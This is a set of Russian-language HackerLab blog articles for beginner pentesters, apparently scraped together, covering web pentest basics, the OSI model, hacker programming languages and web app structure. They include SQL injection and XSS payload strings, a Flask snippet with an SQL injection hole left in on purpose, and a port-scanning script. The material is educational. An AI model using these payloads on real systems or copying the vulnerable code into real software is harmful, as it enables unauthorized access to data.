    <meta name="description"
          content="Изучаем безопасность веб-приложений: основные протоколы, типы уязвимостей, настройка Kali и практика на CTF.">
    <meta name="keywords"
          content="sql, веб-пентест, безопасность сайтов, pentest, xss, sql injection, ctf, изучение пентеста, кибербезопасность, hackerlab">
    <title>Первые шаги в веб-пентесте: от теории к практике</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>Допустим, вы хотите научиться искать уязвимости в сайтах и веб-приложениях, но не знаете, с чего начать. Как
    разобраться в HTTP-запросах? Зачем учить HTML и SQL? Какие навыки действительно нужны для веб-пентеста?</p>

<p>В этой статье - простая и честная инструкция для тех, кто хочет сделать первые шаги в безопасности веба. Без воды, на
    конкретных примерах.</p>

<p>В этой статье мы наглядно и поэтапно разберём каждый из семи уровней модели OSI через призму реального примера —
    загрузки сайта в браузере. Мы покажем, какие технологии и протоколы работают на каждом уровне, какие уязвимости
    могут возникать, и почему знание этих нюансов критически важно для проведения тестирования на проникновение и
    обеспечения сетевой безопасности.</p>

<div data-toc="Что такое веб-пентест и зачем он нужен" id="web-pentest"></div>
<h3>Что такое веб-пентест и зачем он нужен</h3>

<p>Любая работа по тестированию на проникновение начинается с получения домена или ip адреса тестируемого ресурса, но
    что это такое?</p>

<p>Веб-пентест (Web Application Penetration Testing) - это проверка веб-приложения на уязвимости с помощью реальных
    атак. Цель - найти дыры в защите до того, как это сделает злоумышленник.</p>

<p>Пентест включает следующие этапы:</p>

<ul>
    <li><b>Разведка:</b> сбор информации о цели (домен, IP, CMS, поддомены, уязвимые параметры).</li>
    <li><b>Сканирование:</b> использование сканеров и ручной проверки для выявления слабых мест.</li>
    <li><b>Эксплуатация:</b> попытка использовать найденные уязвимости, чтобы получить доступ к данным или системе.</li>
    <li><b>Анализ результатов:</b> подтверждение наличия уязвимостей, оценка их критичности.</li>
    <li><b>Рекомендации:</b> формирование отчёта и предложений по устранению проблем.</li>
</ul>

<img src="https://hackerlab.pro/game_api/articles/static/ea23ee7f-37f9-4374-b64d-e7f418289c05/five-stages.png"
     alt="5 стадий пентеста">

<div data-toc="Что нужно знать перед стартом" id="before-starting"></div>
<h3>Что нужно знать перед стартом</h3>

<p>Чтобы начать тестировать веб-приложения, нужно понимать, как они устроены. Вот базовые темы, которые стоит
    освоить:</p>

<p><b>1. Как работает веб</b></p>
<ul>
    <li><b>HTTP, методы GET и POST</b> - позволяют понять, как формируются и отправляются запросы.</li>
    <li><b>Cookies и сессии</b> - критичны для понимания авторизации и XSS.</li>
    <li><b>Основы сети (IP, DNS, прокси, VPN)</b> - пригодятся при обходе ограничений и анализе трафика.</li>
</ul>

<p><b>2. Базовые технологии</b></p>
<ul>
    <li><b>HTML</b> - поможет находить скрытые поля, комментарии с секретами, параметры форм.</li>
    <li><b>JavaScript</b> - нужен для анализа клиентской логики и поиска XSS.</li>
    <li><b>SQL</b> - обязателен для понимания SQL-инъекций. Учите <b>SELECT, WHERE, UNION, INSERT</b>.</li>
</ul>

<p>Дополнительно полезно знать основы серверных языков: PHP, Node.js и др. Это поможет понять, как обрабатываются данные
    на стороне сервера.</p>

<div data-toc="Практика: с чего начать" id="practice"></div>
<h3>Практика: с чего начать</h3>

<p>Установка инструментов — это только начало. Настоящая практика начинается, когда вы начинаете <b>проверять, ломать, настраивать и ошибаться</b>. Вот с чего стоит начать новичку:</p>

<p><b>1. Разверните окружение для пентеста</b></p>

<ul>
    <li>Установите <b>Kali Linux</b> или <b>Parrot OS</b> — это дистрибутивы, в которых уже предустановлены десятки инструментов для анализа веб-приложений.</li>
    <li>Разверните их на виртуалке (VirtualBox или VMware), чтобы не рисковать основной ОС.</li>
    <li>Попробуйте использовать <b>Live-сессию</b> или <b>переносной установочный USB</b>, если не хотите ставить систему всерьёз.</li>
</ul>

<p><b>2. Освойтесь в терминале</b></p>
<p>Запомните базовые команды:</p>

<pre>ls, cd — навигация по каталогам
cat, nano — просмотр и редактирование файлов
grep — поиск нужной информации
</pre>

<p>Вы будете использовать их каждый день. Терминал — ваш основной инструмент.</p>

<p><b>3. Освойте базовые сканеры и утилиты</b></p>

<p>Начните с трёх ключевых:</p>

<ul>
    <li><b>nmap</b> — сканирование портов, сервисов, версии ПО</li>
    <li><b>Burp Suite</b> — перехват и модификация HTTP-трафика</li>
    <li><b>sqlmap</b> — автоматический поиск SQL-инъекций</li>
</ul>

<p><b>4. Настройте тренировочную цель</b></p>

<p>Без живой цели вы не научитесь ничему. Попробуйте:</p>

<ul>
    <li>Установить <b>DVWA (Damn Vulnerable Web App)</b> — сайт с уязвимостями внутри</li>
    <li>Поднять <b>OWASP Juice Shop</b> — современное SPA-приложение с кучей уязвимостей</li>
    <li>Использовать тренировочные машины с сайтов вроде HackTheBox или RootMe</li>
</ul>

<p>Для этого вам, скорее всего, придётся научиться работать с <b>VPN</b> и <b>локальными сетями</b>. Это полезный и важный навык в пентесте.</p>

<div data-toc="Популярные уязвимости, которые стоит изучить" id="popular-vulnerabilities"></div>
<h3>Популярные уязвимости, которые стоит изучить</h3>

<p>Вот список базовых, но критичных уязвимостей, с которых стоит начать:</p>

<ul>
    <li><b>SQL Injection (SQLi):</b> внедрение SQL-кода в запрос, например: <b>admin' OR '1'='1</b> - позволяет обойти логин или получить данные из базы.</li>
    <li><b>Cross-Site Scripting (XSS):</b> внедрение JavaScript-кода в поля ввода. Пример: <b>&lt;script&gt;alert('xss')&lt;/script&gt;</b> - может использоваться для кражи cookie или перехвата сессий.</li>
    <li><b>Cross-Site Request Forgery (CSRF):</b> атака, заставляющая пользователя выполнить нежелательное действие, будучи авторизованным.</li>
    <li><b>Remote Code Execution (RCE):</b> возможность исполнить произвольный код на сервере - самый опасный тип уязвимости.</li>
    <li><b>Server-Side Request Forgery (SSRF):</b> возможность заставить сервер отправить запрос к внутреннему ресурсу.</li>
</ul>

<div data-toc="Где тренироваться?" id="where-training"></div>
<h3>Где тренироваться?</h3>

<p>Чтение - хорошо, но навыки приходят только через практику. Лучшие способы прокачаться - CTF и тренировочные платформы:</p>

<ol>
    <li><a href="https://hackerlab.pro">HackerLab</a> - русскоязычная платформа с VPN-доступом, реальными стендами и курсами. Подробнее о формате соревнований и советах новичкам <a href="https://hackerlab.pro/blog/kak-nachat-uchastvovat-v-ctf-dlya-novichkov">читай в статье</a></li>
    <li><a href="https://www.hackthebox.com/" target="_blank">Hack The Box</a> - международная платформа с виртуальными машинами и заданиями.</li>
    <li><a href="https://www.root-me.org/" target="_blank">Root Me</a> - разнообразные задачи по всем направлениям ИБ.</li>
</ol>

<div data-toc="Заключение" id="conclusion"></div>
<h3>Заключение</h3>

<p>Путь веб-пентестера - это постоянное обучение, тестирование, эксперименты. Начать можно с баз: разобраться в HTTP, научиться смотреть на сайт глазами атакующего и потренироваться на стендах.</p>

<p>Заходи на <a href="https://hackerlab.pro" target="_blank">HackerLab</a> и решай реальные задачи. Опыт приходит с практикой - и ты уже на верном пути.</p>

</body>
</html>


Первые шаги в веб-пентесте: от теории до практики

Разбираем уровни модели OSI на примере загрузки сайта. Почему сетевые знания — база для пентеста, аудита и любой работы в сфере информационной безопасности.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Основы сетей для начинающих в ИБ: без модели OSI ты слеп">
    <meta name="keywords"
          content="модель OSI, основы сетей, информационная безопасность, сети для новичков, пентест, сетевые протоколы, TCP/IP, ARP, уровни OSI, уязвимости сети">
    <title>Основы сетей для начинающих в ИБ: без модели OSI ты слеп</title>
</head>
<body>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>В современном мире информационной безопасности знание сетевых технологий — не просто преимущество, а жизненная
    необходимость. Каждый день специалисты сталкиваются с задачами анализа, защиты и тестирования сетей, и без понимания
    базовых принципов работы сетевого взаимодействия любые усилия становятся поверхностными. Одной из ключевых
    концепций, лежащих в основе сетевого обмена данными, является модель OSI, которая описывает, как именно информация
    проходит от пользователя до сервера и обратно.</p>

<p>В этой статье мы наглядно и поэтапно разберём каждый из семи уровней модели OSI через призму реального примера —
    загрузки сайта в браузере. Мы покажем, какие технологии и протоколы работают на каждом уровне, какие уязвимости
    могут возникать, и почему знание этих нюансов критически важно для проведения тестирования на проникновение и
    обеспечения сетевой безопасности.</p>

<div data-toc="Что такое домен и IP-адрес" id="domain-ip"></div>
<h3>Что такое домен и IP-адрес</h3>

<p>Любая работа по тестированию на проникновение начинается с получения домена или ip адреса тестируемого ресурса, но
    что это такое?</p>

<p>Домен — это удобочитаемое имя, которое скрывает за собой IP-адрес, уникальный идентификатор устройства в сети. Однако
    за этой, казалось бы, простой связкой скрывается сложная система взаимодействия устройств и протоколов, благодаря
    которым работает весь интернет и частные корпоративные сети.</p>

<p>Чтобы разобраться в этой системе и уметь находить в ней слабые места, специалисту по информационной безопасности
    необходимо чётко понимать, как именно происходит передача данных. Здесь на помощь приходит модель OSI (Open Systems
    Interconnection), которая описывает сетевое взаимодействие в виде семи логических уровней — от физических сигналов
    до приложений, с которыми взаимодействует пользователь.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-model.gif"
     alt="Сетевая модель OSI">

<div data-toc="Пример: загрузка сайта и уровни модели OSI" id="osi-model"></div>
<h3>Пример: загрузка сайта и уровни модели OSI</h3>

<p>Каждый уровень модели OSI отвечает за свой участок работы: физический уровень описывает передачу электрических
    сигналов, канальный отвечает за передачу кадров между соседними устройствами, сетевой — за маршрутизацию пакетов,
    транспортный — за надежность доставки, и так далее вплоть до прикладного уровня, где работают привычные нам
    протоколы вроде HTTP или SMTP, но давайте обо всем по порядку. Разберем ситуацию, с котором любой человек
    встречается каждый день – загрузка сайта в веб-браузере.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-l7.png"
     alt="L7. Прикладной уровень">

<p>Когда человек вводит адрес сайта в адресной строке, на самом верхнем, прикладном уровне, начинают работать такие
    протоколы, как DNS и HTTP или HTTPS. DNS нужен для того, чтобы преобразовать понятное человеку доменное имя в
    IP-адрес, который уже понимают машины. После этого формируется HTTP-запрос к серверу, и если соединение защищённое,
    используется HTTPS. На этом же уровне обрабатываются и другие прикладные протоколы, например SMTP при работе с
    электронной почтой или FTP для передачи файлов.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-l6.png"
     alt="L6. Уровень представления">

<p>Далее данные спускаются на уровень представления, который отвечает за шифрование и преобразование данных. Здесь в
    игру вступают протоколы TLS или SSL — именно они позволяют передавать информацию в зашифрованном виде, защищая её от
    перехвата и подмены. Если сайт использует HTTPS, на этом уровне устанавливается шифрованный канал связи между
    браузером и сервером.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-l5.png"
     alt="L5. Сеансовый уровень">

<p>После этого включается сеансовый уровень, который управляет установкой и поддержанием сессии. Благодаря ему
    соединение может оставаться активным определённое время, даже если часть данных передаётся фрагментами. На этом
    уровне происходит важный этап согласования параметров шифрования, обмен ключами и поддержка текущей сессии.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-l4.png"
     alt="L4. Транспортный уровень">

<p>Затем данные переходят на транспортный уровень, где основную роль играет протокол TCP. Он отвечает за надёжную
    доставку данных, разбиение их на сегменты, контроль правильности передачи и повторную отправку потерянных
    фрагментов. Благодаря этому пользователь видит целостную страницу, а не разрозненные куски кода.</p>

<p>Когда транспортный уровень завершает свою работу, данные попадают на сетевой уровень. Здесь начинает действовать
    IP-протокол, который отвечает за маршрутизацию: пакеты данных находят путь от вашего компьютера до сервера, минуя
    множество промежуточных маршрутизаторов и сетевых узлов.</p>

<p>После этого данные обрабатываются на канальном уровне. Этот уровень отвечает за передачу кадров между устройствами,
    находящимися в одной сети или находящимися на физически близком расстоянии. Здесь задействуются такие технологии,
    как Ethernet и протокол ARP, которые помогают определить, по какому физическому адресу отправить кадр в пределах
    локальной сети.</p>

<p>Наконец, на физическом уровне данные превращаются в электрические или оптические сигналы, либо в радиоволны в случае
    беспроводных сетей. Именно на этом уровне двоичный код превращается в импульсы, которые проходят по кабелям,
    оптоволокну или передаются по воздуху через Wi-Fi.</p>

<img src="https://hackerlab.pro/game_api/articles/static/b110952b-d4fe-441e-b9f7-074392a8dfc7/osi-model-dynamic.gif"
     alt="Физический уровень">

<div data-toc="Инкапсуляция и обратный процесс" id="encapsulation-and-reverse"></div>
<h3>Инкапсуляция и обратный процесс</h3>

<p>Когда данные доходят до сервера, весь процесс разворачивается в обратную сторону: сигналы снова превращаются в кадры,
    затем в пакеты, которые собираются в сегменты, проходят по сессии, расшифровываются, и наконец превращаются в ответ,
    который обрабатывается прикладным уровнем, этот процесс называется инкапсуляцией.</p>

<div data-toc="Уязвимости на каждом уровне модели OSI" id="vulnerabilities"></div>
<h3>Уязвимости на каждом уровне модели OSI</h3>

<p>Так как на каждом уровне используется большое количество технологий и устройств, для работы с ними возникает большое
    количество уязвимостей, которые можно найти только при понимании специфики работы каждого протокола. Например, если
    не разбираться в нюансах работы транспортного уровня, можно не заметить возможность манипулировать флагами TCP, что
    приводит к созданию различных атак, таких как TCP Reset или порт-сканирование с помощью stealth-методов. Непонимание
    особенностей сетевого уровня может скрыть от аудитора ошибки маршрутизации, которые позволяют злоумышленнику
    перехватывать трафик.</p>

<p>На канальном и физическом уровнях также встречаются уязвимости, связанные с подменой MAC-адресов, ARP-спуфингом или
    атакой через физический доступ к сетевым портам. А если подняться выше, до прикладного уровня, то здесь появляются
    ошибки в логике приложений, уязвимости в реализации протоколов, уязвимости в web-приложениях — всё это лишь верхушка
    айсберга.</p>

<div data-toc="Зачем специалисту по ИБ знать модель OSI" id="security-specialist"></div>
<h3>Зачем специалисту по ИБ знать модель OSI</h3>

<p>Именно поэтому глубокое понимание модели OSI и всех уровней взаимодействия — это не просто академическая теория, а
    важный инструмент для любого специалиста по безопасности. Разбираясь в том, как данные проходят путь от пользователя
    до сервера и обратно, как обрабатываются пакеты и каким образом происходят обмены сообщениями на каждом этапе, мы
    можем не только эффективнее находить и устранять уязвимости, но и более точно предсказывать возможные векторы
    атак.</p>

<p>В конечном счёте, знание сетевых основ превращает тестирование на проникновение из механического поиска в осмысленный
    и творческий процесс, который требует внимательности, гибкости и настоящего инженерного мышления.</p>

<blockquote>❗️Чтобы превратить теорию в реальные навыки, начните практиковаться на специализированных платформах. Мы собрали лучшие из них в отдельной статье -
    <a href="https://hackerlab.pro/blog/ot-teorii-k-praktike-top-platform-po-kiberbezopasnosti">От теории к практике: топ платформ по кибербезопасности</a></blockquote>

<blockquote>👉 Если OSI уже не пугает — пора идти дальше. Вот курс, с которого начинают хакеры и безопасники: <a
        href="https://codeby.school/catalog/kurs-kompyuternye-seti">«Компьютерные сети — от основ до практики»</a>
</blockquote>
</body>
</html>


Основы сетей для начинающих в ИБ: без модели OSI ты слеп

Антиотладка, обход CMP + JE, XOR и переходы по указателям — как надежно спрятать пароль в бинаре и усложнить жизнь реверс-инженеру.

Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну

Какие языки и инструменты нужны этичному хакеру: Bash, Python, Git, Regex и другие. Примеры задач, код и навыки, с которых стоит начать.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Какие языки программирования и инструменты нужно знать этичному хакеру — от Bash до Python, Git и Regex. Примеры, задачи и практика.">
    <meta name="keywords" content="этичный хакер, кибербезопасность, Bash, Python, Git, Regex, языки программирования, инструменты, сканер портов">
    <title>Языки и инструменты, которые должен знать этичный хакер</title>
</head>
<body>

<p>Когда слышишь слово «программирование», обычно вспоминаются сайты, игры или мобильные приложения. Но в кибербезопасности код нужен для другого — автоматизировать задачи, находить уязвимости, анализировать данные и тестировать системы на прочность.</p>


<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>

<p>Если ты хочешь стать хорошим специалистом по информационной безопасности, тебе нужно освоить хотя бы два инструмента:</p>
<ul>
    <li>один — для работы в терминале (чаще всего это Bash),</li>
    <li>второй — для написания утилит и скриптов (чаще всего Python).</li>
</ul>

<p>А дальше — больше. Ты познакомишься с десятком других технологий, которые помогут тебе в реальных атаках, расследованиях и автоматизации рутинных процессов: от Git и Regex до PowerShell и C.</p>

<h2>🔧 Где это применяется на практике?</h2>
<ul>
    <li>Проверка открытых портов сервера — Bash + nmap</li>
    <li>Создание фишинговых страниц — Python + Flask</li>
    <li>Подбор паролей к Wi-Fi — Bash + aircrack-ng</li>
    <li>Анализ дампов и логов — Python + re + pandas</li>
    <li>Поиск XSS в веб-приложении — JavaScript</li>
    <li>Работа с Active Directory — PowerShell</li>
    <li>Сбор данных с помощью OSINT — Python + Bash + парсинг</li>
    <li>Разработка вредоносного ПО на низком уровне — C, Assembly</li>
</ul>

<h2>💥 Мини-обзор: что должен знать этичный хакер</h2>
<table>
    <tr><th>Инструмент</th><th>Где и зачем используется</th></tr>
    <tr><td><b>Bash</b></td><td>Автоматизация атак, работа в Linux, сканеры, логика CLI</td></tr>
    <tr><td><b>Python</b></td><td>Эксплойты, фреймворки, автоматизация анализа и сбора данных</td></tr>
    <tr><td><b>JavaScript</b></td><td>XSS, DOM Clobbering, фишинг, браузерные атаки</td></tr>
    <tr><td><b>C/C++</b></td><td>Эксплойты низкого уровня, драйверы, работа с памятью</td></tr>
    <tr><td><b>Go</b></td><td>Создание быстрых и переносимых CLI-инструментов и C2-серверов</td></tr>
    <tr><td><b>PowerShell</b></td><td>Взлом и администрирование в Windows-средах, работа с AD</td></tr>
    <tr><td><b>PHP</b></td><td>Разработка бэкдоров, веб-шеллов, эксплуатация уязвимостей</td></tr>
    <tr><td><b>SQL</b></td><td>SQL-инъекции, дампы баз, обход авторизации</td></tr>
    <tr><td><b>Assembly</b></td><td>Реверс-инжиниринг, бинарная эксплуатация, анализ вредоносов</td></tr>
    <tr><td><b>Git</b></td><td>Контроль версий, безопасное хранение и обмен кодом</td></tr>
    <tr><td><b>Regex</b></td><td>Поиск данных по шаблону в логах, дампах, HTML</td></tr>
</table>

<div data-toc="Bash — язык терминала" id="bash"></div>
<h3>Bash — язык терминала</h3>
<p><b>Bash</b> — один из главных инструментов в Kali Linux и других дистрибутивах. Он позволяет автоматизировать сканирование, запуск эксплойтов, работу с файлами, логами, сетями.</p>
<pre><code>for ip in 192.168.1.{1..5}; do
  ping -c 1 $ip
done</code></pre>
<p>Этот скрипт пингует адреса от 192.168.1.1 до 192.168.1.5. Измени диапазон — и адаптируй под свою сеть.</p>

<div data-toc="Python — универсальный инструмент" id="python"></div>
<h3>Python — универсальный инструмент</h3>
<p><b>Python</b> — язык номер один среди этичных хакеров. Он подходит для написания эксплойтов, фреймворков, веб-интерфейсов, анализа данных и автоматизации всего, что можно.</p>
<pre><code>import socket

for port in range(1, 101):
    try:
        s = socket.socket()
        s.settimeout(0.5)
        s.connect(("127.0.0.1", port))
        print(f"Порт {port} открыт")
        s.close()
    except:
        pass</code></pre>
<p>Добавь логирование, потоки, отчёты — и получится готовый сканер портов.</p>

<div data-toc="Git — контроль версий" id="git"></div>
<h3>Git — контроль версий</h3>
<p><b>Git</b> помогает вести историю изменений, работать в команде и публиковать код в открытом доступе. Без него — никуда. Многие фреймворки хранятся именно на GitHub.</p>
<pre><code>git clone https://github.com/example/repo.git
git status
git add .
git commit -m "Добавил сканер"
git push</code></pre>
<p>Изучи Git с самого начала, чтобы не потерять свои наработки и не бояться ветвлений и слияний.</p>

<div data-toc="Regex — регулярные выражения" id="regex"></div>
<h3>Regex — регулярные выражения</h3>
<p><b>Regex</b> — незаменимый инструмент при анализе логов, HTML, дампов. Помогает быстро находить пароли, IP, email и любые другие шаблонные данные.</p>
<pre><code>import re

text = "Контакты: test@mail.com, second@mail.ru"
emails = re.findall(r"\S+@\S+", text)
print(emails)</code></pre>
<p>Измени выражение, чтобы искать IP-адреса, хэши или специфичные параметры URL.</p>

<div data-toc="Резюме" id="resume"></div>
<h3>Резюме</h3>
<table>
    <tr><th>Инструмент</th><th>Роль</th></tr>
    <tr><td><b>Bash</b></td><td>Автоматизация и работа в Linux</td></tr>
    <tr><td><b>Python</b></td><td>Скрипты, эксплойты, анализ данных</td></tr>
    <tr><td><b>Git</b></td><td>Версионность и командная работа</td></tr>
    <tr><td><b>Regex</b></td><td>Поиск и фильтрация информации</td></tr>
</table>

<h2>🧪 Мини-практика</h2>
<ul>
    <li>Напиши Bash-скрипт, который выводит все IP от 192.168.0.1 до 192.168.0.10</li>
    <li>Реализуй сканер портов на Python для диапазона 1–100</li>
    <li>Напиши регулярку, которая извлекает IP-адреса из строки</li>
</ul>
</body>
</html>


Языки и инструменты, которые должен знать этичный хакер

Разбираем, как устроены современные веб-приложения: браузер, сервер, база данных и уязвимости. Практика и советы для будущих пентестеров.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>Как устроены сайты: веб-технологии глазами пентестера</title>
</head>
<body>

<blockquote>
    ⚠️ Дисклеймер:
    <br>
    Вся информация в этой статье предоставлена исключительно в образовательных целях. Автор и платформа HackerLab не поощряют и не несут ответственности за любые противоправные действия, совершённые на основе изложенного материала. Используйте знания этично и только в рамках закона.
</blockquote>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Ты открываешь сайт. Видишь форму входа, кнопки, красивую анимацию. Но под этой оболочкой работает целый механизм:
    клиент, сервер, база данных. И именно в этих частях чаще всего прячутся уязвимости.</p>

<p>Чтобы стать пентестером, недостаточно уметь отправлять запросы. Нужно понимать, <b>как устроено веб-приложение</b>,
    как
    данные путешествуют от браузера до базы — и где на этом пути можно сломать что-то важное.</p>

<div data-toc="Что такое веб-приложение" id="web-app"></div>
<h3>Что такое веб-приложение</h3>

<p>Веб-приложение — это сайт, у которого есть логика. Это не просто страничка с текстом, а полноценная система с
    пользователями, авторизацией, товарами, базами данных и API.</p>

<img src="https://hackerlab.pro/game_api/articles/static/adbd1819-707a-4a7e-a7f0-795b4b0b2deb/client-server-model.png"
     alt="Модель клиент-сервер">

<p>Когда ты заходишь на сайт, происходит следующее:</p>

<ol>
    <li><b>Браузер</b> отправляет HTTP-запрос на сервер (например, GET /profile?id=42)</li>
    <li><b>Сервер</b> принимает запрос, обрабатывает его, достаёт данные из базы</li>
    <li>Возвращает HTML-код страницы</li>
    <li><b>Браузер</b> отображает страницу, применяет CSS и запускает JavaScript</li>
</ol>

<p>На каждом шаге — шанс на ошибку. И каждый шаг можно проанализировать.</p>

<div data-toc="Разбор: ты заходишь на https://example.com/profile?id=42" id="example"></div>
<h3>Разбор: ты заходишь на <code>https://example.com/profile?id=42</code></h3>

<p>Что происходит:</p>

<ul>
    <li>https:// — защищённый протокол связи</li>
    <li>example.com — домен (через DNS превращается в IP)</li>
    <li>/profile — путь на сервере, обрабатывается кодом</li>
    <li>?id=42 — параметр, который можно изменить</li>
</ul>

<p>Пентестер думает: «А что будет, если я подставлю ?id=43? А ?id=1 OR 1=1?»</p>

<div data-toc="HTML, CSS, JS — зачем они тебе?" id="languages"></div>
<h3>HTML, CSS, JS — зачем они тебе?</h3>

<table>
    <thead>
    <tr>
        <th>Технология</th>
        <th>Роль в приложении</th>
        <th>Где искать уязвимости</th>
    </tr>
    </thead>
    <tbody>
    <tr>
        <td><strong>HTML</strong></td>
        <td>Разметка страницы, формы, ввод</td>
        <td>XSS, hidden-поля, параметры</td>
    </tr>
    <tr>
        <td><strong>CSS</strong></td>
        <td>Визуальное оформление</td>
        <td>Редко, но возможны edge-кейсы</td>
    </tr>
    <tr>
        <td><strong>JS</strong></td>
        <td>Поведение на клиенте, интерактив</td>
        <td>DOM-based XSS, уязвимый fetch</td>
    </tr>
    </tbody>
</table>

<p><b>Пример:</b></p>

<p>Открываешь DevTools (F12), находишь форму логина. Видишь input с именем email. JS-проверка требует @, но ты знаешь,
    что на сервер можно отправить всё, что угодно.</p>

<p>Пентестер всегда смотрит: «Что валидирует браузер — а что можно обойти?»</p>

<div data-toc="HTTP-запросы: как браузер говорит с сервером" id="http"></div>
<h3>HTTP-запросы: как браузер говорит с сервером</h3>
<p><b>Пример запроса:</b></p>
<code>
    GET /profile?id=42 HTTP/1.1
    Host: example.com
    Cookie: session=abc123
    User-Agent: Firefox
</code>

<p><b>Что здесь важно:</b></p>

<ul>
    <li><code>Cookie</code> — ключ к сессии. Его можно украсть (XSS) или подделать</li>
    <li><code>User-Agent</code> — можно менять, чтобы обходить фильтры</li>
    <li><code>?id=42</code> — можно попытаться использовать в атаке</li>
</ul>

<p>Попробуй:</p>
<code>curl -v "https://example.com/profile?id=42"</code>

<div data-toc="Серверная логика: где принимаются решения" id="server-logic"></div>
<h3>Серверная логика: где принимаются решения</h3>

<p>На сервере может быть любой язык: Python, PHP, Node.js, Ruby...</p>

<p>Пример (Flask, Python):</p>
<pre>
    <code>
@app.route('/profile')
def profile():
    user_id = request.args.get("id")
    return db.query(f"SELECT * FROM users WHERE id={user_id}")
    </code>
</pre>

<p>Видишь <code>f"SELECT * FROM ..."</code>? Здесь SQL-инъекция. Если подставить <code>id=1 OR 1=1</code>, получим все
    записи.</p>

<p>Сервер — это место, где пентестер ищет логические ошибки, плохие проверки, дырки в авторизации.</p>

<div data-toc="Базы данных: где лежит всё ценное" id="databases"></div>
<h3>Базы данных: где лежит всё ценное</h3>

<p>Каждое веб-приложение работает с базой данных. Именно туда сохраняются:</p>

<ul>
    <li>логины и пароли (иногда в открытом виде)</li>
    <li>письма, посты, товары, комментарии</li>
    <li>токены и куки</li>
</ul>

<p><b>Основные типы:</b></p>
<table>
    <thead>
    <tr>
        <th>Тип</th>
        <th>Где используется</th>
        <th>Уязвимости</th>
    </tr>
    </thead>
    <tbody>
    <tr>
        <td><b>MySQL</b></td>
        <td>WordPress, CMS</td>
        <td>SQL-инъекции, дампы</td>
    </tr>
    <tr>
        <td><b>SQLite</b></td>
        <td>Мобильные/локальные</td>
        <td>Легко читается, подменяется</td>
    </tr>
    <tr>
        <td><b>MongoDB</b></td>
        <td>Современные SPA</td>
        <td>NoSQL-инъекции, открытые API</td>
    </tr>
    </tbody>
</table>

<p>Если сервер плохо фильтрует вход — ты можешь пробраться в базу.</p>

<div data-toc="Тренировочные песочницы" id="sandboxes"></div>
<h3>Тренировочные песочницы</h3>

<ol>
    <li><a href="https://www.hackthebox.com/" target="_blank">HackTheBox</a></li>
    <li><a href="https://portswigger.net/web-security" target="_blank">PortSwigger</a></li>
    <li><a href="https://hackerlab.pro/">HackerLab</a></li>
</ol>

<div data-toc="Что запомнить" id="remember"></div>
<h3>Что запомнить</h3>

<ul>
    <li>Веб-приложение — это не просто сайт. Это клиент + сервер + база</li>
    <li>Всё, что ты видишь в адресной строке — можно изменить</li>
    <li>HTML/JS — источник XSS и DOM-уязвимостей</li>
    <li>Сервер часто обрабатывает параметры как есть</li>
    <li>База данных — конечная цель, именно там лежат флаги, пароли, доступ</li>
</ul>

</body>
</html>


Как устроены сайты: веб-технологии глазами пентестера

Обзор нейросетевых инструментов, которые автоматизируют пентест, разведку, фишинг и криптоанализ. Актуальные решения для Red Team в 2025 году.

<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="utf-8">
    <title>ТОП‑10 AI‑инструментов для наступательной кибербезопасности в 2025 году</title>
</head>
<body>

<p>Думаете, игры в Capture the Flag — это просто развлечение, не имеющее ничего общего с серьезной работой? На самом
    деле, опыт CTF может стать вашим трамплином в профессиональный мир кибербезопасности!</p>

<div data-toc="Введение" id="introduction"></div>
<h3>Введение</h3>
<p>Наступательная безопасность в 2025 году - это уже не просто «эксплойт запустил - доступ получил». Сегодня Red Team работает с растущими объёмами данных, постоянно меняющимися архитектурами и защитами, которые учатся быстрее, чем люди успевают писать отчёты.</p>

<p>Чтобы не терять темп, специалисты Red Team всё чаще включают в свой арсенал инструменты на базе искусственного интеллекта. Они берут на себя рутину: автоматизируют разведку, анализируют конфигурации, находят потенциальные уязвимости ещё до появления CVE - и даже предлагают нестандартные векторы атак.</p>

<p>В этом обзоре - 10 AI-инструментов, которые уже сейчас меняют правила игры в наступательной безопасности. Некоторые из них - хорошо известны, другие только начинают набирать обороты. Но все они - про будущее offensive security, которое уже наступило.</p>

<div data-toc="SentinelAI - автоматизированный анализ инфраструктуры" id="sentinel-ai"></div>
<h3><a href="https://github.com/ayaan-cs/SentinelAI" target="_blank">SentinelAI</a> - автоматизированный анализ инфраструктуры</h3>
<p>Инструмент предназначен для поиска уязвимостей в корпоративных сетях. Использует методы машинного обучения, чтобы выявлять слабые места в конфигурациях, моделировать атаки и оценивать потенциальный ущерб. Учитывает актуальные шаблоны угроз и подстраивается под них. Подходит как для технического аудита, так и для подготовки к Red Team-операциям.</p>

<div data-toc="DeepExploit - AI‑движок для автономного пентестинга" id="deepexploit"></div>
<h3><a href="https://codeby.net/threads/deep-exploit-fully-automatic-pentest-mashinnoye-obucheniye.63759/" target="_blank">DeepExploit</a> - AI‑движок для автономного пентестинга</h3>
<p>Инструмент, построенный на базе MITRE ATT&CK, умеет самостоятельно подбирать эксплойты и выполнять атаки по цепочке - от первичного вектора до полной компрометации. Хорошо подходит для тестирования защищённости без вмешательства человека. Со временем обучается и оптимизирует свои действия.</p>

<div data-toc="PhishBrain - фишинг, подстроенный под поведение жертвы" id="phishbrain"></div>
<h3><a href="http://www.libraesva.com/" target="_blank">PhishBrain</a> - фишинг, подстроенный под поведение жертвы</h3>
